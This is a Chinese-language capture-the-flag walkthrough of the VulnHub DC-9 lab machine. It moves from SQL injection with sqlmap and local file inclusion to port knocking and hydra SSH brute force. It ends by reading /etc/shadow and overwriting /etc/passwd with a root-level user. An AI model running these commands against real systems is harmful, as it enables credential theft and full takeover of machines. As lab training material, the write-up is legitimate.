一、介绍

运行环境：Virtualbox

攻击机：kali（10.0.2.15）

靶机：DC9（10.0.2.62）

目标：获取靶机root权限和flag

靶机下载地址：https://www.vulnhub.com/entry/dc-9,412/

二、信息收集

使用nmap主机发现靶机ip：10.0.2.62

使用nmap端口扫描发现靶机开放端口：22、80

nmap -A 10.0.2.62 -p 1-65535

打开网站发现是一个员工数据网站

查看该网站各个功能点，发现一个搜索信息功能 ，测试是否存在sql注入漏洞

发现输入Mary'回显异常，输入Mary'#回显正常，存在sql注入

三、漏洞利用

使用burpsuite抓搜索信息的数据包，将数据包保存在post.txt文件，直接使用sqlmap工具进行测试，发现两个用户表

sqlmap -r post.txt -D Staff -T Users --dump
sqlmap -r post.txt -D users -T UserDetails --dump 

网站应该是使用admin用户登录，admin用户名密码：admin:856f5de590ef37314e7c3bdf6f8a66dc

使用在线网站解密得到：admin:transorbital1

登录网站，发现在底下存在信息File does not exist，可能存在文件包含漏洞

使用burpsuite爆破LFI，发现file参数

根据/etc/passwd文件内容，发现靶机存在用户如下：

root:x:0:0:root:/root:/bin/bash
marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash
julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash
fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash
barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash
tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash
jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash
wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash
bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash

根据之前nmap的扫描结果22端口被关闭了，怀疑是配置了knockd服务，我们可以尝试包含knockd的配置文件

端口敲门服务，即：knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务，使用自定义的一系列序列号来“敲门”，使系统开启需要访问的服务端口，才能对外访问。不使用时，再使用自定义的序列号来“关门”，将端口关闭，不对外监听。进一步提升了服务和系统的安全性。他的默认配置文件是：/etc/knockd.conf

使用knockd敲门，打开22端口

knock 10.0.2.62 7469 8475 9842

使用之前sqlmap跑出来的用户名密码登录ssh

发现只有chandlerb、joeyt和Ilovepeepee用户的用户名密码可以登录ssh

四、提权

查看这三个用户是否存在特权命令，或是否存在具有root权限的可利用的可执行文件，均未发现

翻一翻靶机各个文件夹，在janitor用户home/.secrets-for-putin目录下发现存在一个字典文件

使用hydra工具和新获得的字典文件对靶机ssh进行暴力破解，发现一组新的用户：fredf:B4-Tru3-001

hydra -L user1.txt -P passwd.txt ssh://10.0.2.62:22 -t 64 

登录fredf用户

使用sudo -l查看一下具有sudo权限的程序，发现可以无密码以root权限运行/opt/devstuff/dist/test/test

发现test程序是一个python文件编译得到的，python文件源码如下：

该脚本将读取第一个参数文件内容，写入第二个参数文件中

可以使用test程序读取/etc/shadow的内容，然后使用john工具进行暴力破解，前提条件是你得有一个强大的字典

sudo /opt/devstuff/dist/test/test /etc/shadow shadow
cat shadow

我们可以通过向/etc/passwd中添加用户达到提权

利用Perl和crypt来使用salt值为我们的密码生成哈希值

perl -le 'print crypt("123456","addedsalt")'

创建一个password文件，将/etc/passwd文件内容复制进去，然后将test用户的信息加入 password 文件

test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash

使用password文件将/etc/passwd文件覆盖

sudo /opt/devstuff/dist/test/test password /etc/passwd

用户名：test 密码： 123456 登录主机，登录成功后，是 root 权限

获取flag

参考链接：https://blog.csdn.net/qq_43462485/article/details/109456721